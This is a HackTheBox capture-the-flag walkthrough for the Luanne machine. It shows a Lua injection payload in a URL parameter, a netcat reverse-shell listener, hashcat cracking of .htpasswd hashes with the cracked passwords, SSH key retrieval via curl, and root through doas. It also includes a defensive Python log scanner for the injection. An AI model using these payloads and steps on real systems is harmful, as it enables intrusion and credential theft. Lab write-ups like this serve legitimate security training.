Luanne HackTheBox WalkThrough
This is the Luanne HackTheBox machine walkthrough. In this writeup I have demonstrated step by step how I rooted the Luanne HTB machine. Before starting, let us know something about this machine. It is a NetBSD box (which I came to know only after I got into the box) with IP address 10.10.10.218 and difficulty easy assigned by its maker. First of all, connect your PC to the HackTheBox VPN and make sure of your connectivity with the Luanne machine by pinging its IP 10.10.10.218. If all goes well, start hacking.
As usual, I started by scanning the machine. I used Nmap (a port scanner) for this task, and this time I added the nmap switch -O to detect the operating system, since we do not know its OS beforehand. The result is below:
$ sudo nmap -sC -sV -O -oN launne.nmap 10.10.10.218
Nmap found port 9001 open, but it did not identify the OS and did not even guess its name. Anyway, we will find its version once we are inside the box. For now let us enumerate ports 22, 80 and 9001. OpenSSH 8.0 is running on port 22, and its banner also revealed the operating system name, NetBSD. So here we came to know that the OS of the Luanne machine is NetBSD. SSH will be helpful once we get some credentials in further enumeration.
Let us dig deeper into the services on the remaining ports. The Nginx 1.19 web server is running on port 80 and the Medusa 1.12 web server is running on port 9001. Since web servers are running on ports 80 and 9001, we should have websites at http://10.10.10.218 and http://10.10.10.218:9001. Going to these URLs, I found a login page on both of them, like the one in the Tomcat web server. If you analyze the nmap report carefully you will find that the nmap script http-robots.txt revealed a folder weather on port 80, which can be accessed at http://10.10.10.218/weather/.
When I visited this URL it gave me a 404 - Not Found error. Then I brute forced files and folders using dirsearch (a directory and file bruteforcer written in Python) with the wordlist directory-list-1.0.txt (this wordlist can be found in the directory /usr/share/wordlists/dirbuster/ on Kali & Parrot):
$ sudo dirsearch -u http://10.10.10.218/weather/ -w /usr/share/wordlists/dirbuster/directory-list-1.0.txt -e all -t 40 | tee big.out
Directory bruteforcing revealed a file forecast. After accessing it at http://10.10.10.218/weather/forecast I got a message in JSON format revealing a parameter city with the value list, i.e. city=list. When I accessed that URL I got information about different cities. On fuzzing this parameter I got an error revealing that this website uses the Lua programming language. Check this URL for the error: http://10.10.10.218/weather/forecast?city=London'.
Since it uses Lua, I fuzzed the URL with some Lua strings and found that if we append ')os.execute("whoami") to the end of http://10.10.10.218/weather/forecast?city=London, it executes an OS command on the Luanne machine. I think this is the reason the machine is named Luanne: we are able to execute code via a Lua statement, and Luanne also contains the word Lua. Let us confirm OS command execution by reading the /etc/passwd file of the Luanne machine.
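From the defender's side, this is what the injection looks like in the web server's access log. The following Python example is added here and is not part of the original walkthrough: it scans constructed nginx access-log lines for the /weather/forecast endpoint and flags city values that break out of a Lua string literal or name a Lua OS/IO function. The log lines and the client address 10.10.14.5 are made up, and the allowlist of what a valid city value should look like is an assumption about the endpoint.

```python
import re
from urllib.parse import urlparse, parse_qs

# Lua functions that never belong in a city name; a strong sign of injection.
LUA_SINKS = ("os.execute", "io.popen", "loadstring", "dofile", "require")
# The breakout shape this page shows: a quote closing the string literal and a
# parenthesis closing the call, as in London')os.execute("whoami")
BREAKOUT = re.compile(r"""['"]\s*\)""")
# Assumed allowlist: a plain city name or the keyword list the endpoint accepts.
VALID_CITY = re.compile(r"^[A-Za-z][A-Za-z .-]{0,63}$")
# Common log format as written by nginx.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})')

# Constructed sample log lines; 10.10.14.5 is a made-up client address.
SAMPLE_LOG = [
    '10.10.14.5 - - [16/Nov/2020:10:01:02 +0000] "GET /weather/forecast?city=London HTTP/1.1" 200 231',
    '10.10.14.5 - - [16/Nov/2020:10:01:09 +0000] "GET /weather/forecast?city=list HTTP/1.1" 200 118',
    '10.10.14.5 - - [16/Nov/2020:10:02:40 +0000] "GET /weather/forecast?city=London%27%29os.execute%28%22whoami%22%29 HTTP/1.1" 500 0',
    '10.10.14.5 - - [16/Nov/2020:10:03:00 +0000] "GET /weather/forecast?city=London%27 HTTP/1.1" 500 0',
]

def city_values(target):
    """Return the decoded city values of a /weather/forecast request target."""
    parsed = urlparse(target)
    if not parsed.path.startswith("/weather/forecast"):
        return []
    # parse_qs percent-decodes for us, so %27%29 comes back as ')
    return parse_qs(parsed.query, keep_blank_values=True).get("city", [])

def classify_city(value):
    """Return why a city value looks like Lua injection; empty list means benign."""
    reasons = []
    if BREAKOUT.search(value):
        reasons.append("string/call breakout")
    reasons += [f"lua sink {s}" for s in LUA_SINKS if s in value.lower()]
    if not reasons and not VALID_CITY.match(value):
        reasons.append("unexpected characters in city")
    return reasons

def scan_log(lines):
    """Return (client ip, request target, reasons) for every suspicious request."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        for value in city_values(m["target"]):
            reasons = classify_city(value)
            if reasons:
                hits.append((m["ip"], m["target"], reasons))
    return hits
```

The same allowlist check, applied in the Lua handler before the value reaches any string-built expression, is the mitigation; the log scan only tells you after the fact that someone tried.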
Confirming OS Command Execution
Open the following URL in a browser to confirm code execution on the Luanne machine.
We have successfully confirmed remote code execution on the Luanne machine. Let us get a user shell on our local machine using a reverse-shell one-liner. I have used the nc one-liner; you can find others at Pentestmonkey.
Getting User Shell
To get a reverse shell, first start a netcat listener on your Kali machine and then open the following URL in the browser. You will get a shell.
$ rlwrap nc -nvlp 1234
$ whoami && id
We have got a user shell as user _httpd. The home folder of this user, i.e. the current folder, contains a hidden file .htpasswd. Listing the contents of this file, I found the password hash of a user:
$ ls -la
$ cat .htpasswd
Let us identify the type of this hash so that we can crack it using hashcat (an offline password cracker). hash-identifier identified this hash as MD5 (Unix). Let us crack it using the wordlist rockyou.txt, which can be found inside the directory /usr/share/wordlists/ on Kali and Parrot OS.
Cracking Hash 1 using Hashcat
$ hashcat -m 500 -a 3 '$1$vVoNCsOl$lMtBS6GL2upDbR4Owhzyc0' /usr/share/wordlists/rockyou.txt
$ hashcat -m 500 -a 3 '$1$vVoNCsOl$lMtBS6GL2upDbR4Owhzyc0' /usr/share/wordlists/rockyou.txt --show
Hashcat has successfully cracked the hash; the cracked password is iamthebest. So we have the credential iamthebest. When I tried to SSH using this credential it failed. After some enumeration I found that port 3001 is listening locally. When I tried to access the service on port 3001 via the URL http://127.0.0.1:3001 I got a 401 Unauthorized error. So I used the credential iamthebest to access the service and found that we could log in easily; this time there was no access denied error.
$ curl http://127.0.0.1:3001
$ curl -u 'webapi_user':'iamthebest' http://127.0.0.1:3001
After some further enumeration I got the id_rsa key of user r.michaels from inside his home folder using the curl command. This is somewhat different from the usual case: normally the id_rsa file is present inside the .ssh folder of the user's home directory and can be accessed by that user and root only. But here it can be accessed from a web server running locally, so this file must be present inside some type of public_html folder. I did not know exactly which folder it is in until I had pwned the box.
$ curl -u 'webapi_user':'iamthebest' http://127.0.0.1:3001/~r.michaels/id_rsa
We have got an SSH private key. Let us SSH into the Luanne machine using this key after changing its permissions.
Getting User Shell using SSH
$ vi id_rsa
$ chmod 400 id_rsa
$ ssh -i id_rsa r.michaels@10.10.10.218
$ whoami && id
We are now logged in as user r.michaels. Let us capture the user flag.
Capture User Flag
$ cat user.txt
To escalate privileges to root we first have to find a privilege escalation vector. For this I ran linpeas.sh (a post-exploitation enumeration script), but linpeas did not find any valid PrivEsc vector. So I started manual enumeration on the box. After spending some time on the box I found a file devel_backup-2020-09-16.tar.gz.enc inside the directory /home/r.michaels/backups/. I did not know how to extract this file. If it were a .tar.gz we would use the tar tool to extract it, but it has the .enc extension. After some googling I found the tool netpgp, which can decrypt this file. Check this for more info.
Finding PrivEsc Vector
$ ls -la /home/r.michaels/backups/
To extract this file I simply copied it into the /tmp/ folder and decrypted and extracted it using the following commands. When it asks for a password, enter the password.
$ cd /tmp/
$ netpgp --decrypt /home/r.michaels/backups/devel_backup-2020-09-16.tar.gz.enc --output=devel_backup-2020-09-16.tar.gz
$ tar -xf devel_backup-2020-09-16.tar.gz
$ cat devel-2020-09-16/www/.htpasswd
After extracting this file I found another hash, $1$6xc7I/LW$WuSQCS6n3yXsjPMSmwHDu., of a user. It is again an MD5 (Unix) hash (you can see the result of hash-identifier). After cracking this hash using hashcat I found the password littlebear. Then I tried to switch to the root user using the doas command of NetBSD, and I could easily log in as root. So here our PrivEsc vector is Privilege Escalation using Credential Dumping.
Cracking Hash 2 using Hashcat
$ hashcat -m 500 -a 3 '$1$6xc7I/LW$WuSQCS6n3yXsjPMSmwHDu.' /usr/share/wordlists/rockyou.txt
$ hashcat -m 500 -a 3 '$1$6xc7I/LW$WuSQCS6n3yXsjPMSmwHDu.' /usr/share/wordlists/rockyou.txt --show
Let us change to the root user using the doas command. doas in NetBSD is the equivalent of the sudo command on Linux: it executes a command as another user. For more info check this link from FreeBSD.org.
$ doas -u root /bin/sh
# whoami && id
Capture Root Flag
Let us capture the root flag.
# cat /root/root.txt
This was how I rooted the Luanne HackTheBox machine. I learnt a lot after rooting this box, and I hope you have also learnt some new things from this walkthrough. Thanks for reading this writeup. For any query or suggestion feel free to write to us at [email protected].